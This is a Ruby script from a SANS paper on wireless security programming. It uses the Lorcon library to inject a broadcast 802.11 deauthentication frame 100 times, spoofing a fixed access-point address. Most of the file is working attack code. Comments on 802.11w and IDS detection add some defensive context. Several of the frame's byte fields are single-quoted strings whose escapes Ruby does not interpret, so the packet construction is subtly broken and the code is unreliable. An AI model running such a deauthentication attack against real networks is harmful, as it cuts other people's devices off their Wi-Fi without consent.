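#!/usr/bin/ruby
########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################

# Demonstration script from the paper: opens a Lorcon injection device on the
# configured interface and writes one broadcast 802.11 deauthentication
# management frame to it 100 times.
#
# Defensive context: deauthentication is an unauthenticated management frame
# unless the network negotiates 802.11w Protected Management Frames (mandatory
# in WPA3), which lets stations discard forged ones. A wireless IDS can flag
# the pattern built here: a burst of deauthentication frames addressed to
# broadcast whose source address equals the BSSID.

# Script-wide settings; unknown keys read back as "Unknown".
$datastore = Hash.new("Unknown")
$datastore["INTERFACE"] = "ath0"
$datastore["CHANNEL"] = 11
$datastore["DRIVER"] = "madwifing"

# Load the Lorcon binding. Only load and ordinary runtime failures are caught,
# so Interrupt and SystemExit are no longer swallowed by the rescue.
begin
  require "Lorcon"
  @lorcon_loaded = true
rescue LoadError, StandardError => e
  @lorcon_loaded = false
  @lorcon_error = e
end

unless @lorcon_loaded
  puts "The Lorcon module is not available: #{@lorcon_error.to_s}"
  raise RuntimeError, "Lorcon not available"
end

# XXX: Force the interface to be up
# Best effort, as before, but a failure is now reported instead of ignored.
unless system("ifconfig", $datastore["INTERFACE"], "up")
  warn "ifconfig could not bring #{$datastore["INTERFACE"]} up"
end

wifi = ::Lorcon::Device.new($datastore["INTERFACE"], $datastore["DRIVER"])

# Validate the handle before configuring it: with the check placed after the
# attribute writes, a nil handle would raise NoMethodError and this message
# would never be shown.
raise RuntimeError, "Could not open the wireless device interface" unless wifi

wifi.fmode = "INJECT"
# Take the channel from the datastore (11) rather than repeating the literal.
wifi.channel = $datastore["CHANNEL"]
wifi.txrate = 2
wifi.modulation = "DSSS"

# Addressing: destination is broadcast; source and BSSID are the same address.
destination_addr = "\xff\xff\xff\xff\xff\xff"
source_addr = "\x00\x0e\xa6\xce\xe2\x28"
bss_id_addr = "\x00\x0e\xa6\xce\xe2\x28"

# Type/Subtype 0/c0 Management/Deauthentication
packet = '\xc0\x00'
# flags and duration
packet = packet + '\x00\x00'
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
# fragment number and sequence number
packet = packet + '\x00\x00'
# Reason code
packet = packet + '\x01\x00'

puts "Deauth Attack\n"

100.times do
  wifi.write(packet)
end

puts "Done"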